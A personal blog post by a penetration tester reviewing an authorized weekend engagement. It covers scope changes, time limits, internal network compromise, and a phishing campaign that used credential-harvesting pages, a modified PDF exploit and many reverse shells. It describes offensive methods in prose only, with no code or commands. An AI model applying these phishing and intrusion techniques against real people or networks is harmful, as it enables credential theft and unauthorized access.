Saturday, October 18, 2008

A Successful Pentest with some Failures.

I'm busy preparing for a [de]briefing following a pentest that Eric and I completed a few weeks ago and was thinking about some of the challenges we faced on this particular engagement. Overall the engagement was VERY successful. We owned the client's infrastructure pretty much completely. This post is not so much about where we succeeded as it's about where we failed or could have improved our processes.

The one element that made this engagement different from most was the limited [really limited!] amount of time we had to complete all aspects of the engagement. 50 hours! This might seem a reasonable amount of time but when you consider that this included the remote, local [internal], phishing and reporting, it's a truly limited amount of time.

After finally getting all the contracts and authorization AKA 'Cover Your Ass' agreements signed we were finally able to proceed with the actual work. The scope itself placed some severe limitations on us but at the same time was very broad in what areas we could target. A contradiction I know. The scope, aside from limiting the amount of active time we had to do the work, as limited us to specific days for when we could actually perform any testing. The remote portion started on a friday night and the internal portion could begin on the Saturday and had a hard stop for both of 8pm on Sunday night.

This while not ideal did provide us with time to do the work. The remote portion of the engagement went pretty fast. The client had a reasonably small internet footprint and numerous sites and devices were out of scope. The internal portion though started off badly with the scope changing drastically. I HATE scope creep!

It turns out that the client was undergoing a large infrastructure and server migration. The address ranges we were provided were now invalid. No problem right? Just get the two new /24 ranges. But noooo, the client had changed the entire subnetting scheme and now we had servers accross about 6 or so subnets. Our scanning and fingerprinting time just increased one hullava a lot. Trying to explain to the client that this was now out of scope was like getting blood from a stone. Rather than posponing the pentest for an indefinite amount of time while waiting for another window to perform the work we decided to focus on only specific subnets and locations, again limiting the scope. Even so one of the things that became obvious was that rather than having the time to scan, enumerate and fingerprint the network and get a solid picture of how it operates and devices interact, I would have to be looking at potential ingress points while the scanning was going on. Not ideal but doable.

One thing I realized is that I'm going to need to keep more than one cheat sheet of scanning arguments for this type of situation in the future. By limiting your scan time you limit what can scan for and rather than taking scan results and reviewing them and then targeting and focusing on a single host, you need to decide on which hosts have the potential for greatest success and leave the others aside. This means you will miss things that may impact the success of the engagement.

Anyway, after enumerating workstations and servers via SMB and DCERPC scans I had an initial list of targets I wanted to focus on. While all this was going on I was also looking for a lot of the usual misconfigurations on the network such as unauthorized shares, default smtp community strings, insecure printers, workstations running the server service, etc... I found them all btw. ;)
So after bypassing the proxy, exfiltrating some data, and getting access to the SAN I needed to focus on the servers and workstations. What I realised was that I needed to better script some of the things I normally do. Running nessus from the command line is great. It's easy to script and cycle through some specific addys. I also realized I needed a few more specific custom scans that looked for a few specific vulnerabilities that I might leverage.

I did end up getting direct access on about 3 or 4 servers through various means. Being very focused as to what I was looking for and basing those searches on my initial analysis of their enviroment paid off. Luckily. It could have gone the other way and that would have, well, sucked. I managed to leverage some of those servers to get a little deeper into the network as well. The limitation on time meant that I could not use those boxes to pivot much deeper into the network. I simply checked for dual homed servers and scanned those subnets. The report covered the potential for further exploitation and access. Thankfully I'd already written scripts that when run would upload my scan utility, run it based on the ipconfig data and download the results to my host.

Another issue was that because this took place over the weekend the office was dead quiet. This meant no port level security, etc... This always makes man in the middle attacks pretty trivial and a great way to spoof dns, steal tokens, passwords, intercept RDP sessions, etc... Well with no traffic that sucked. The VoIP network segment was a little easier as we could create the voice traffic ourselves. That's always fun when you can intercept and replay the voice traffic.

The big issue with the internal portion, aside from managing changes in the scope, was that with limited time you really needed to know what your ultimate target was and to be able to make a decision on the path to take to achieve that goal. Do you target the servers directly? Do you go in via a workstation or do you attack the channels between these devices?

Obviously there are other routes to take but the point is that you need to be sure your direction is the right one or be able to change vectors quickly once you realise that the vector you're using is not working.

The phising portion of the engagement, while incredibly successful, also highlighted the issue of limited time while trying to gain as much information as possible. I've developed a series of scripts that I use in my phishing attacks to harvest, format and send emails, serve up webpages with code to drop a file, steal credentials and gather user information [both automatically and by enticing the user to enter credentials]. These scripts have served me well even though they need to be customized for the current client.

We made the decision that we would not have time to leverage any access we gained from the phish and so we wanted to gather as much data as possible from the target host before moving on to the next one. I have a series of scripts that will gather local data such as users, groups, domain, routes, browser history, etc, etc... I also have a script that takes screenshots of the remote host and downloads them to my system. [I love this script!] All the scripts work very well and save me a lot of time but one of the things I realized was that a phish can be too successful. :)

We had so many shells come through, that even with splitting them between Eric and myself we still missed some and were not able to gather all the data from everyone the way we wanted. I'm putting together a script that will call most of the other scripts when it runs so that I can run it once, gather the data and move on. Our current process is far more efficient than manually gathering that data but it still takes more time that I like in situations like this.

The ability to revise the payload mid phish was also something we had to do and, while we manged, it could have been done far more effeciently. I should have prepared the alternate payloads beforehand to account for this eventuality. Changing the payload on the webserver was as simple as replacing the existing on and modifying the headers in the page. The email was a little more difficult though. I needed to stop the existing smtp script, modify the paylaod and restart it with only the remaining emials being targeted. I then needed to regenerate a new phish email, containing the new payload and a new message, to entice the users that were already targeted. All this while trying to handle the existing shells. While it only takes one user to click on the link or attachment to be successful, this phish was about gathering as much data from as many users as possible.

I don't think our phish would have been half as successful if it had not been for mc and his ninja-like skills in modifying a pdf exploit to run as a Metasploit module, allowing us to use all the payloads in the framework. Awesome stuff.

Our ability to handle multiple payloads connecting back to our servers could also be improved. I actually lost about 5 shells because I could not establish a new session fast enough. Also, rather than having to run a script manually on the target it would be more effecient to have the payload execute a series of commands when it is executed without requiring any interaction at all.
When all was said and done the pentest was actually very successful and we achived all our goals, even with the hiccups we had along the way. It's always a good feeling when an engagement goes well, especially in an environment like this one.

It's important to review the processes and methods you use during an engagement regularily to see if they can be improved or made more effecient. Small things can make a huge difference to the success of a project.

Cheers,
/dean

2 comments: